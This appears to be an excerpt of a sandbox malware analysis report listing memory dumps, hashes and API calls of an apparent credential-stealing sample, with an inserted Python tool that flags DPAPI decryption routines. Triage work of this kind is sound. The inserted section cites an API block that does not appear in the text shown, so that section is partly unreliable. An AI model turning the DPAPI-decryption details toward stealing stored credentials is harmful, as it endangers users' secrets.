                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00709B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00709BB3
                          • LocalFree.KERNEL32(?), ref: 00709BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 8fc5cb12fcfa5485ec61bec916d6e0cf7f4ae2d2554b97b9b8d81d45343f9e21
                          • Instruction ID: 07fb5be9d4147e5a2f0439effdab352710d34ab9ee83b8b01d71ee7de220e5aa
                          • Opcode Fuzzy Hash: 8fc5cb12fcfa5485ec61bec916d6e0cf7f4ae2d2554b97b9b8d81d45343f9e21
                          • Instruction Fuzzy Hash: 1A011DB5E45309ABE7109BA4DC45FAFB7B8EB44B00F104554FA04AB281E7B49A00CBE1
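The "APIs" list above (CryptUnprotectData, then LocalAlloc, then LocalFree, in call-site order) is the shape of a DPAPI blob-decryption helper: the output DATA_BLOB that CryptUnprotectData hands back must be released with LocalFree, and the all-zero middle arguments mean no optional entropy and no prompt structure, so the blob is decryptable by any process running as the same user. The Python below is an added example, not code from Joe Sandbox or from the sample; it parses the report's own "APIs" lines (the two lists above, copied verbatim as sample input) and flags that sequence. The argument names come from the documented CryptUnprotectData parameter order; the report's `?` means the value was not resolved statically, and the classifier treats it as unknown rather than guessing.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Sample input: the two "APIs" lists from the function blocks above, copied
# as they appear in the report (one DPAPI routine, one COM/string routine).
DPAPI_BLOCK = """\
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00709B9F
• LocalAlloc.KERNEL32(00000040,?), ref: 00709BB3
• LocalFree.KERNEL32(?), ref: 00709BD7
"""
COM_BLOCK = """\
• CoCreateInstance.COMBASE(0072B110,00000000,00000001,0072B100,?), ref: 0071CB06
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0071CB46
• lstrcpyn.KERNEL32(?,?,00000104), ref: 0071CBC9
"""


class ApiCall(NamedTuple):
    name: str
    module: str
    args: Tuple[Optional[int], ...]  # hex arg values; None where the report shows '?'
    ref: int                         # call-site address from the "ref:" field


_CALL_RE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)\s*,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse one 'APIs' list into ApiCall records, ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue  # headings, 'Memory Dump Source' lines etc. are not call records
        raw_args = [a.strip() for a in m["args"].split(",") if a.strip()]
        args = tuple(None if a == "?" else int(a, 16) for a in raw_args)
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c.ref)


# Documented parameter order of CryptUnprotectData (crypt32.dll); the report
# prints arguments positionally, so this maps slots to names.
_CUD_PARAMS = ("pDataIn", "ppszDataDescr", "pOptionalEntropy", "pvReserved",
               "pPromptStruct", "dwFlags", "pDataOut")
LPTR = 0x0040  # LMEM_FIXED | LMEM_ZEROINIT, the LocalAlloc flag seen in the report


def classify_dpapi_routine(calls: List[ApiCall]) -> Optional[dict]:
    """Return a summary if the call list looks like a DPAPI blob-decryption helper:
    CryptUnprotectData followed (by address) by LocalFree, which is how the caller
    must release the DATA_BLOB.pbData it receives. Returns None otherwise."""
    cud = next((c for c in calls if c.name == "CryptUnprotectData"), None)
    if cud is None:
        return None
    later = [c for c in calls if c.ref > cud.ref]
    if not any(c.name == "LocalFree" for c in later):
        return None
    params = dict(zip(_CUD_PARAMS, cud.args))
    alloc = next((c for c in later if c.name == "LocalAlloc"), None)
    return {
        "ref": cud.ref,
        # NULL entropy: the blob was protected with no secondary secret, so any
        # process in the same user context can decrypt it.
        "no_entropy": params.get("pOptionalEntropy") == 0,
        "no_prompt": params.get("pPromptStruct") == 0,
        "flags": params.get("dwFlags"),
        # Plaintext is copied into a freshly zeroed fixed buffer before the
        # DPAPI output is released.
        "copies_to_zeroed_buffer": alloc is not None and alloc.args[:1] == (LPTR,),
    }


def scan_report_blocks(blocks: List[str]) -> List[dict]:
    """Run the classifier over several 'APIs' lists and keep only the hits."""
    hits = []
    for block in blocks:
        summary = classify_dpapi_routine(parse_api_block(block))
        if summary:
            hits.append(summary)
    return hits


if __name__ == "__main__":
    for hit in scan_report_blocks([DPAPI_BLOCK, COM_BLOCK]):
        print("DPAPI decrypt routine at 0x%08X: %s" % (hit["ref"], hit))
```

Run on the two lists above, only the CRYPT32 block is reported; the CoCreateInstance/MultiByteToWideChar/lstrcpyn block parses cleanly but is not a DPAPI routine. The same parser can be pointed at every "APIs" list in the report to count how many functions touch DPAPI, which is a quick triage signal for credential-stealing behaviour before reading the disassembly.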
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: \7/
                          • API String ID: 0-1966033871
                          • Opcode ID: 1b3f70ca5e5e383b2199e5097c0947f485bbd39dc8ad25b1b9da9090812f6d75
                          • Instruction ID: 2644c7f8171a71868104f542f6ff4591e4889b998a8ccfd16f790eded28e4202
                          • Opcode Fuzzy Hash: 1b3f70ca5e5e383b2199e5097c0947f485bbd39dc8ad25b1b9da9090812f6d75
                          • Instruction Fuzzy Hash: 6D61F1B290C7189FE3047E69EC8577ABBE4EF54320F164A3CEAC487740EA7958518787
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q^
                          • API String ID: 0-3614340472
                          • Opcode ID: 051b3831c67d566e1cf9c98eb7e9ed0c7e9e363937728fbcef8441a12a0cde63
                          • Instruction ID: b100c8140f7faf70b7f4a213313569a48c4be9eba820dbbdfa0e317690fc2162
                          • Opcode Fuzzy Hash: 051b3831c67d566e1cf9c98eb7e9ed0c7e9e363937728fbcef8441a12a0cde63
                          • Instruction Fuzzy Hash: 225146B260C304DFCB80AE6DDCC4639BBE5EB98310F76497DD9C687704E6321845A643
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76b728d0de5457d630f5aa8ebebb6951bb9b56858ef88f0c64a93ff325a08496
                          • Instruction ID: 52c73098716a8a83725b11bcb9a602e50265626a269d5361e9a84824bedcc000
                          • Opcode Fuzzy Hash: 76b728d0de5457d630f5aa8ebebb6951bb9b56858ef88f0c64a93ff325a08496
                          • Instruction Fuzzy Hash: 057106B3A087049FE3046E29DC4476AB7E6EF94720F1A893DD6C883344EA3569058797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f366c713b49e764985fdcc7352009a9c88595a7e9d5d0763751389d2c43aa89
                          • Instruction ID: 5aba6497b6aaeffec1f529abe00270e08ab89779d44a71e74160a166ee8be678
                          • Opcode Fuzzy Hash: 6f366c713b49e764985fdcc7352009a9c88595a7e9d5d0763751389d2c43aa89
                          • Instruction Fuzzy Hash: 8A5168F3D182285BF70C292CAD187767A99D790320F1A433DEB96A7784ED69590082C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 674690b80ea7b897fdd83440394298c9c1d8a658b99274361204b678ff1c1e27
                          • Instruction ID: 06eccb5019434b28c15b649d72eddd492bcff2bffcff5f0526ac6f932253510d
                          • Opcode Fuzzy Hash: 674690b80ea7b897fdd83440394298c9c1d8a658b99274361204b678ff1c1e27
                          • Instruction Fuzzy Hash: B2514AF3E083048BE3006E29DD8477AB7D6AFD0721F2AC63DDAC447788F57959458246
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 157a66cad0c1c330b235610f5a87bf22bf3e58d0f2963576bd7db0b387a2d4fd
                          • Instruction ID: 38e1461f57ffc426968cf1f26615b9fc567db903eb8108a12c5caf1c26c369af
                          • Opcode Fuzzy Hash: 157a66cad0c1c330b235610f5a87bf22bf3e58d0f2963576bd7db0b387a2d4fd
                          • Instruction Fuzzy Hash: 7C414DF3A081045FE3049A19DC8576BB7EADFD4730F1AC63DDAD457784ED39A8058292
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 79a66662e718c7bda89a7cb69867c501deaab8f58a2adca4489cfd600d85f7f0
                          • Instruction ID: 3775dc30832274d53ede400db2f5d39cefba29116edf3237c9933df07850f19a
                          • Opcode Fuzzy Hash: 79a66662e718c7bda89a7cb69867c501deaab8f58a2adca4489cfd600d85f7f0
                          • Instruction Fuzzy Hash: 284176F3E185105BF714AA2DEC9477EBA96DBD4320F1B453DDBD583380E839080582C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 952315408376f0184f1421fb3df3330db5eed0b6b1c5569b99ad2b73d7fd3324
                          • Instruction ID: 69e87b5936eb118b5ad2ed517ea5787fc18d693dd2fe7fe4d23f2b777afa609d
                          • Opcode Fuzzy Hash: 952315408376f0184f1421fb3df3330db5eed0b6b1c5569b99ad2b73d7fd3324
                          • Instruction Fuzzy Hash: 6D2136F3F582206BF3186938DC4576BB696AFD0720F2B813CD6C993B84E53899164781
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00718636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 007186AA
                          • StrStrA.SHLWAPI(?,010DDC18), ref: 007186CF
                          • lstrcpyn.KERNEL32(009393D0,?,00000000), ref: 007186EE
                          • lstrlen.KERNEL32(?), ref: 00718701
                          • wsprintfA.USER32 ref: 00718711
                          • lstrcpy.KERNEL32(?,?), ref: 00718727
                          • StrStrA.SHLWAPI(?,010DDBE8), ref: 00718754
                          • lstrcpy.KERNEL32(?,009393D0), ref: 007187B4
                          • StrStrA.SHLWAPI(?,010DDA08), ref: 007187E1
                          • lstrcpyn.KERNEL32(009393D0,?,00000000), ref: 00718800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 7de5d08fe28c62df74405fc7e8bba144f82aa6a8a248137ebcc86198a331a6cd
                          • Instruction ID: ba2c96f53468647f5272c0333ca00d2c8fed4cfb13c6d22d7f84881df8a8af9a
                          • Opcode Fuzzy Hash: 7de5d08fe28c62df74405fc7e8bba144f82aa6a8a248137ebcc86198a331a6cd
                          • Instruction Fuzzy Hash: DEF17E72A14214EFCB10DB68DD48ADB77B9EF48300F144595F909E3291DB74AE41DFA1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701F9F
                          • lstrlen.KERNEL32(010D89A0), ref: 00701FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701FE3
                          • lstrlen.KERNEL32(00731794), ref: 00701FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070200E
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00702042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070204D
                          • lstrlen.KERNEL32(00731794), ref: 00702058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702075
